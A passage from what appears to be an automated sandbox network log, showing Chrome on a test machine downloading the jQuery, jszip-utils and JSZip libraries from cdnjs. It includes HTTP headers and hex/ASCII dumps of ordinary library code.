64 74 68 2c 69 3d 73 2e 6d 69 6e 57 69 64 74 68 2c 6f 3d 73 2e 6d 61 78 57 69 64 74 68 2c 73 2e 6d 69 6e 57
                                                                  Data Ascii: ;return r},Ie=new RegExp(ne.join("|"),"i");function We(e,t,n){var r,i,o,a,s=e.style;return(n=n||Re(e))&&(""!==(a=n.getPropertyValue(t)||n[t])||ie(e)||(a=S.style(e,t)),!y.pixelBoxStyles()&&Pe.test(a)&&Ie.test(t)&&(r=s.width,i=s.minWidth,o=s.maxWidth,s.minW
                                                                  2023-04-26 07:00:20 UTC4856INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 2c 73 7d 2c 73 63 72 6f 6c 6c 62 6f 78 53 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 2c 69 7d 2c 72 65 6c 69 61 62 6c 65 54 72 44 69 6d 65 6e 73 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 26 26 28 65 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 61 62 6c 65 22 29 2c 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 72 22 29 2c 6e 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 65 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 31 31 31 31 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c
                                                                  Data Ascii: ion(){return e(),s},scrollboxSize:function(){return e(),i},reliableTrDimensions:function(){var e,t,n,r;return null==a&&(e=E.createElement("table"),t=E.createElement("tr"),n=E.createElement("div"),e.style.cssText="position:absolute;left:-11111px;border-col
                                                                  2023-04-26 07:00:20 UTC4858INData Raw: 72 64 65 72 22 2b 6e 65 5b 61 5d 2b 22 57 69 64 74 68 22 2c 21 30 2c 69 29 3a 73 2b 3d 53 2e 63 73 73 28 65 2c 22 62 6f 72 64 65 72 22 2b 6e 65 5b 61 5d 2b 22 57 69 64 74 68 22 2c 21 30 2c 69 29 29 3b 72 65 74 75 72 6e 21 72 26 26 30 3c 3d 6f 26 26 28 75 2b 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 63 65 69 6c 28 65 5b 22 6f 66 66 73 65 74 22 2b 74 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 74 2e 73 6c 69 63 65 28 31 29 5d 2d 6f 2d 75 2d 73 2d 2e 35 29 29 7c 7c 30 29 2c 75 7d 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 52 65 28 65 29 2c 69 3d 28 21 79 2e 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 28 29 7c 7c 6e 29 26 26 22 62 6f 72 64 65 72 2d 62 6f 78 22 3d 3d 3d 53 2e 63 73 73 28 65 2c 22 62 6f
                                                                  Data Ascii: rder"+ne[a]+"Width",!0,i):s+=S.css(e,"border"+ne[a]+"Width",!0,i));return!r&&0<=o&&(u+=Math.max(0,Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-o-u-s-.5))||0),u}function Je(e,t,n){var r=Re(e),i=(!y.boxSizingReliable()||n)&&"border-box"===S.css(e,"bo
                                                                  2023-04-26 07:00:20 UTC4862INData Raw: 6c 54 6f 70 3d 4b 65 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 6c 65 6d 2e 6e 6f 64 65 54 79 70 65 26 26 65 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 65 2e 65 6c 65 6d 5b 65 2e 70 72 6f 70 5d 3d 65 2e 6e 6f 77 29 7d 7d 2c 53 2e 65 61 73 69 6e 67 3d 7b 6c 69 6e 65 61 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2e 35 2d 4d 61 74 68 2e 63 6f 73 28 65 2a 4d 61 74 68 2e 50 49 29 2f 32 7d 2c 5f 64 65 66 61 75 6c 74 3a 22 73 77 69 6e 67 22 7d 2c 53 2e 66 78 3d 4b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 2c 53 2e 66 78 2e 73 74 65 70 3d 7b 7d 3b 76 61 72 20 5a
                                                                  Data Ascii: lTop=Ke.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},S.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2},_default:"swing"},S.fx=Ke.prototype.init,S.fx.step={};var Z
                                                                  2023-04-26 07:00:20 UTC4866INData Raw: 64 73 5b 72 2e 64 75 72 61 74 69 6f 6e 5d 3a 72 2e 64 75 72 61 74 69 6f 6e 3d 53 2e 66 78 2e 73 70 65 65 64 73 2e 5f 64 65 66 61 75 6c 74 29 2c 6e 75 6c 6c 21 3d 72 2e 71 75 65 75 65 26 26 21 30 21 3d 3d 72 2e 71 75 65 75 65 7c 7c 28 72 2e 71 75 65 75 65 3d 22 66 78 22 29 2c 72 2e 6f 6c 64 3d 72 2e 63 6f 6d 70 6c 65 74 65 2c 72 2e 63 6f 6d 70 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 72 2e 6f 6c 64 29 26 26 72 2e 6f 6c 64 2e 63 61 6c 6c 28 74 68 69 73 29 2c 72 2e 71 75 65 75 65 26 26 53 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 72 2e 71 75 65 75 65 29 7d 2c 72 7d 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 66 61 64 65 54 6f 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 69 6c 74 65 72 28 61 65 29
                                                                  Data Ascii: ds[r.duration]:r.duration=S.fx.speeds._default),null!=r.queue&&!0!==r.queue||(r.queue="fx"),r.old=r.complete,r.complete=function(){m(r.old)&&r.old.call(this),r.queue&&S.dequeue(this,r.queue)},r},S.fn.extend({fadeTo:function(e,t,n,r){return this.filter(ae)
                                                                  2023-04-26 07:00:20 UTC4870INData Raw: 2e 73 65 74 28 65 2c 6e 2c 74 29 29 3f 72 3a 65 5b 74 5d 3d 6e 3a 69 26 26 22 67 65 74 22 69 6e 20 69 26 26 6e 75 6c 6c 21 3d 3d 28 72 3d 69 2e 67 65 74 28 65 2c 74 29 29 3f 72 3a 65 5b 74 5d 7d 2c 70 72 6f 70 48 6f 6f 6b 73 3a 7b 74 61 62 49 6e 64 65 78 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 66 69 6e 64 2e 61 74 74 72 28 65 2c 22 74 61 62 69 6e 64 65 78 22 29 3b 72 65 74 75 72 6e 20 74 3f 70 61 72 73 65 49 6e 74 28 74 2c 31 30 29 3a 70 74 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7c 7c 64 74 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 65 2e 68 72 65 66 3f 30 3a 2d 31 7d 7d 7d 2c 70 72 6f 70 46 69 78 3a 7b 22 66 6f 72 22 3a 22 68 74 6d 6c 46 6f 72 22 2c 22 63 6c 61 73 73 22 3a 22 63 6c 61 73 73
                                                                  Data Ascii: .set(e,n,t))?r:e[t]=n:i&&"get"in i&&null!==(r=i.get(e,t))?r:e[t]},propHooks:{tabIndex:{get:function(e){var t=S.find.attr(e,"tabindex");return t?parseInt(t,10):pt.test(e.nodeName)||dt.test(e.nodeName)&&e.href?0:-1}}},propFix:{"for":"htmlFor","class":"class
                                                                  2023-04-26 07:00:20 UTC4874INData Raw: 61 74 65 54 79 70 65 7c 7c 64 2c 6d 74 2e 74 65 73 74 28 73 2b 64 29 7c 7c 28 6f 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3b 6f 3b 6f 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 29 70 2e 70 75 73 68 28 6f 29 2c 61 3d 6f 3b 61 3d 3d 3d 28 6e 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 45 29 26 26 70 2e 70 75 73 68 28 61 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 61 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 7c 7c 43 29 7d 69 3d 30 3b 77 68 69 6c 65 28 28 6f 3d 70 5b 69 2b 2b 5d 29 26 26 21 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 29 66 3d 6f 2c 65 2e 74 79 70 65 3d 31 3c 69 3f 73 3a 63 2e 62 69 6e 64 54 79 70 65 7c 7c 64 2c 28 6c 3d 28 59 2e 67 65 74 28 6f 2c 22 65 76 65 6e 74 73 22 29 7c 7c 4f 62 6a 65 63 74 2e 63 72 65 61 74 65
                                                                  Data Ascii: ateType||d,mt.test(s+d)||(o=o.parentNode);o;o=o.parentNode)p.push(o),a=o;a===(n.ownerDocument||E)&&p.push(a.defaultView||a.parentWindow||C)}i=0;while((o=p[i++])&&!e.isPropagationStopped())f=o,e.type=1<i?s:c.bindType||d,(l=(Y.get(o,"events")||Object.create
                                                                  2023-04-26 07:00:20 UTC4878INData Raw: 53 4f 4e 22 7d 2c 63 6f 6e 76 65 72 74 65 72 73 3a 7b 22 2a 20 74 65 78 74 22 3a 53 74 72 69 6e 67 2c 22 74 65 78 74 20 68 74 6d 6c 22 3a 21 30 2c 22 74 65 78 74 20 6a 73 6f 6e 22 3a 4a 53 4f 4e 2e 70 61 72 73 65 2c 22 74 65 78 74 20 78 6d 6c 22 3a 53 2e 70 61 72 73 65 58 4d 4c 7d 2c 66 6c 61 74 4f 70 74 69 6f 6e 73 3a 7b 75 72 6c 3a 21 30 2c 63 6f 6e 74 65 78 74 3a 21 30 7d 7d 2c 61 6a 61 78 53 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 46 74 28 46 74 28 65 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 29 2c 74 29 3a 46 74 28 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2c 65 29 7d 2c 61 6a 61 78 50 72 65 66 69 6c 74 65 72 3a 49 74 28 4f 74 29 2c 61 6a 61 78 54 72 61 6e 73 70 6f 72 74 3a 49 74 28 50 74 29 2c 61 6a 61
                                                                  Data Ascii: SON"},converters:{"* text":String,"text html":!0,"text json":JSON.parse,"text xml":S.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?Ft(Ft(e,S.ajaxSettings),t):Ft(S.ajaxSettings,e)},ajaxPrefilter:It(Ot),ajaxTransport:It(Pt),aja
                                                                  2023-04-26 07:00:20 UTC4883INData Raw: 28 75 3d 54 2e 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 28 22 65 74 61 67 22 29 29 26 26 28 53 2e 65 74 61 67 5b 66 5d 3d 75 29 29 2c 32 30 34 3d 3d 3d 65 7c 7c 22 48 45 41 44 22 3d 3d 3d 76 2e 74 79 70 65 3f 6c 3d 22 6e 6f 63 6f 6e 74 65 6e 74 22 3a 33 30 34 3d 3d 3d 65 3f 6c 3d 22 6e 6f 74 6d 6f 64 69 66 69 65 64 22 3a 28 6c 3d 73 2e 73 74 61 74 65 2c 6f 3d 73 2e 64 61 74 61 2c 69 3d 21 28 61 3d 73 2e 65 72 72 6f 72 29 29 29 3a 28 61 3d 6c 2c 21 65 26 26 6c 7c 7c 28 6c 3d 22 65 72 72 6f 72 22 2c 65 3c 30 26 26 28 65 3d 30 29 29 29 2c 54 2e 73 74 61 74 75 73 3d 65 2c 54 2e 73 74 61 74 75 73 54 65 78 74 3d 28 74 7c 7c 6c 29 2b 22 22 2c 69 3f 78 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 79 2c 5b 6f 2c 6c 2c 54 5d 29 3a 78 2e 72 65 6a 65 63 74 57 69
                                                                  Data Ascii: (u=T.getResponseHeader("etag"))&&(S.etag[f]=u)),204===e||"HEAD"===v.type?l="nocontent":304===e?l="notmodified":(l=s.state,o=s.data,i=!(a=s.error))):(a=l,!e&&l||(l="error",e<0&&(e=0))),T.status=e,T.statusText=(t||l)+"",i?x.resolveWith(y,[o,l,T]):x.rejectWi
                                                                  2023-04-26 07:00:20 UTC4883INData Raw: 32 33 64 62 0d 0a 2c 22 73 63 72 69 70 74 22 29 7d 7d 29 2c 53 2e 65 61 63 68 28 5b 22 67 65 74 22 2c 22 70 6f 73 74 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 53 5b 69 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6d 28 74 29 26 26 28 72 3d 72 7c 7c 6e 2c 6e 3d 74 2c 74 3d 76 6f 69 64 20 30 29 2c 53 2e 61 6a 61 78 28 53 2e 65 78 74 65 6e 64 28 7b 75 72 6c 3a 65 2c 74 79 70 65 3a 69 2c 64 61 74 61 54 79 70 65 3a 72 2c 64 61 74 61 3a 74 2c 73 75 63 63 65 73 73 3a 6e 7d 2c 53 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 26 26 65 29 29 7d 7d 29 2c 53 2e 61 6a 61 78 50 72 65 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 2e 68 65 61 64 65 72 73 29 22 63
                                                                  Data Ascii: 23db,"script")}}),S.each(["get","post"],function(e,i){S[i]=function(e,t,n,r){return m(t)&&(r=r||n,n=t,t=void 0),S.ajax(S.extend({url:e,type:i,dataType:r,data:t,success:n},S.isPlainObject(e)&&e))}}),S.ajaxPrefilter(function(e){var t;for(t in e.headers)"c
                                                                  2023-04-26 07:00:20 UTC4887INData Raw: 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 66 6f 72 6d 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 3e 3c 2f 66 6f 72 6d 3e 22 2c 32 3d 3d 3d 5f 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 2c 53 2e 70 61 72 73 65 48 54 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 3f 5b 5d 3a 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 6e 3d 74 2c 74 3d 21 31 29 2c 74 7c 7c 28 79 2e 63 72 65 61 74 65 48 54 4d 4c 44 6f 63 75 6d 65 6e 74 3f 28 28 72 3d 28 74 3d 45 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 63 72 65 61 74 65 48 54 4d 4c 44 6f 63 75 6d 65 6e 74 28 22 22 29 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 61 73 65 22 29 29 2e 68 72 65
                                                                  Data Ascii: ).innerHTML="<form></form><form></form>",2===_t.childNodes.length),S.parseHTML=function(e,t,n){return"string"!=typeof e?[]:("boolean"==typeof t&&(n=t,t=!1),t||(y.createHTMLDocument?((r=(t=E.implementation.createHTMLDocument("")).createElement("base")).hre
                                                                  2023-04-26 07:00:20 UTC4891INData Raw: 65 5b 74 5d 2c 74 3d 65 2c 65 3d 6e 29 2c 6d 28 65 29 29 72 65 74 75 72 6e 20 72 3d 73 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 32 29 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 7c 7c 74 68 69 73 2c 72 2e 63 6f 6e 63 61 74 28 73 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 7d 29 2e 67 75 69 64 3d 65 2e 67 75 69 64 3d 65 2e 67 75 69 64 7c 7c 53 2e 67 75 69 64 2b 2b 2c 69 7d 2c 53 2e 68 6f 6c 64 52 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3f 53 2e 72 65 61 64 79 57 61 69 74 2b 2b 3a 53 2e 72 65 61 64 79 28 21 30 29 7d 2c 53 2e 69 73 41 72 72 61 79 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 2c 53 2e 70 61 72 73 65 4a 53 4f 4e 3d 4a 53 4f 4e 2e 70 61 72 73 65 2c 53 2e 6e 6f 64 65 4e
                                                                  Data Ascii: e[t],t=e,e=n),m(e))return r=s.call(arguments,2),(i=function(){return e.apply(t||this,r.concat(s.call(arguments)))}).guid=e.guid=e.guid||S.guid++,i},S.holdReady=function(e){e?S.readyWait++:S.ready(!0)},S.isArray=Array.isArray,S.parseJSON=JSON.parse,S.nodeN
                                                                  2023-04-26 07:00:20 UTC4892INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.349703104.17.25.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:20 UTC4800OUTGET /ajax/libs/jszip-utils/0.1.0/jszip-utils.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:20 UTC4927INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:00:20 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"5eb03ecf-73b"
                                                                  Last-Modified: Mon, 04 May 2020 16:11:59 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: MISS
                                                                  Expires: Mon, 15 Apr 2024 07:00:20 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eIWjcaW8MAzjzD3%2FNShdxLMwkLbWitKlgcEzt6kL%2BhomeRk9ngwvXHfehk2gXKwdVWkt1n%2F9DrXnMr4xHPaqHpoO4oxQbo298%2FO4I8HKKKPMKE6j47Sd%2BRGGSKmrCFwA%2F%2FmhJ%2FKF"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 7bdcf2bd9c380394-FRA
                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  2023-04-26 07:00:20 UTC4928INData Raw: 37 33 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 2e 4a 53 5a 69 70 55 74 69 6c 73 3d 65 28 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 2e 4a 53 5a 69 70 55 74 69 6c 73 3d 65 28 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 28 73 65 6c 66 2e 4a 53 5a 69 70 55 74 69 6c 73 3d 65 28 29 29
                                                                  Data Ascii: 73b!function(e){"object"==typeof exports?module.exports=e():"function"==typeof define&&define.amd?define(e):"undefined"!=typeof window?window.JSZipUtils=e():"undefined"!=typeof global?global.JSZipUtils=e():"undefined"!=typeof self&&(self.JSZipUtils=e())
                                                                  2023-04-26 07:00:20 UTC4928INData Raw: 2c 21 30 29 3b 69 66 28 61 29 72 65 74 75 72 6e 20 61 28 6e 2c 21 30 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 6e 2b 22 27 22 29 7d 76 61 72 20 72 3d 66 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 69 5b 6e 5d 5b 30 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 69 5b 6e 5d 5b 31 5d 5b 65 5d 3b 72 65 74 75 72 6e 20 73 28 74 7c 7c 65 29 7d 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 2c 69 2c 66 2c 75 29 7d 72 65 74 75 72 6e 20 66 5b 6e 5d 2e 65 78 70 6f 72 74 73 7d 66 6f 72 28 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 2c 65 3d 30 3b 65
                                                                  Data Ascii: ,!0);if(a)return a(n,!0);throw new Error("Cannot find module '"+n+"'")}var r=f[n]={exports:{}};i[n][0].call(r.exports,function(e){var t=i[n][1][e];return s(t||e)},r,r.exports,o,i,f,u)}return f[n].exports}for(var a="function"==typeof require&&require,e=0;e
                                                                  2023-04-26 07:00:20 UTC4930INData Raw: 6f 74 61 6c 3a 65 2e 74 6f 74 61 6c 7d 29 7d 29 2c 66 2e 73 65 6e 64 28 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 6e 65 77 20 45 72 72 6f 72 28 65 29 2c 6e 75 6c 6c 29 7d 72 65 74 75 72 6e 20 65 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 75 7d 2c 7b 7d 5d 7d 2c 7b 7d 2c 5b 31 5d 29 28 31 29 7d 29 3b 0d 0a
                                                                  Data Ascii: otal:e.total})}),f.send()}catch(e){o(new Error(e),null)}return e},t.exports=u},{}]},{},[1])(1)});
                                                                  2023-04-26 07:00:20 UTC4930INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.349706104.17.25.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:20 UTC4801OUTGET /ajax/libs/jszip/3.6.0/jszip.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:20 UTC4894INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:00:20 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"606209cf-18328"
                                                                  Last-Modified: Mon, 29 Mar 2021 17:09:35 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: MISS
                                                                  Expires: Mon, 15 Apr 2024 07:00:20 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PI%2BJovbEWHwjt8oM1SDo6yHYIgj5U1xnEfyrP1kgErINeVPcqPr1QUwHgTSZ9ejWuu8LdCSceyj0jWonO%2BWZ9BDI2UoSBgsLX5cbqP8Cx%2BwJVYya4lHNa7BCDWw9I09vnBMD4EGK"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 7bdcf2bd9c892bce-FRA
                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  2023-04-26 07:00:20 UTC4895INData Raw: 37 63 31 31 0d 0a 2f 2a 21 0a 0a 4a 53 5a 69 70 20 76 33 2e 36 2e 30 20 2d 20 41 20 4a 61 76 61 53 63 72 69 70 74 20 63 6c 61 73 73 20 66 6f 72 20 67 65 6e 65 72 61 74 69 6e 67 20 61 6e 64 20 72 65 61 64 69 6e 67 20 7a 69 70 20 66 69 6c 65 73 0a 3c 68 74 74 70 3a 2f 2f 73 74 75 61 72 74 6b 2e 63 6f 6d 2f 6a 73 7a 69 70 3e 0a 0a 28 63 29 20 32 30 30 39 2d 32 30 31 36 20 53 74 75 61 72 74 20 4b 6e 69 67 68 74 6c 65 79 20 3c 73 74 75 61 72 74 20 5b 61 74 5d 20 73 74 75 61 72 74 6b 2e 63 6f 6d 3e 0a 44 75 61 6c 20 6c 69 63 65 6e 63 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 6f 72 20 47 50 4c 76 33 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 53 74 75 6b 2f 6a 73 7a 69 70 2f 6d 61 73 74
                                                                  Data Ascii: 7c11/*!JSZip v3.6.0 - A JavaScript class for generating and reading zip files<http://stuartk.com/jszip>(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/mast
                                                                  2023-04-26 07:00:20 UTC4895INData Raw: 74 69 6f 6e 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3b 65 6c 73 65 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 29 2e 4a 53 5a
                                                                  Data Ascii: tion(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZ
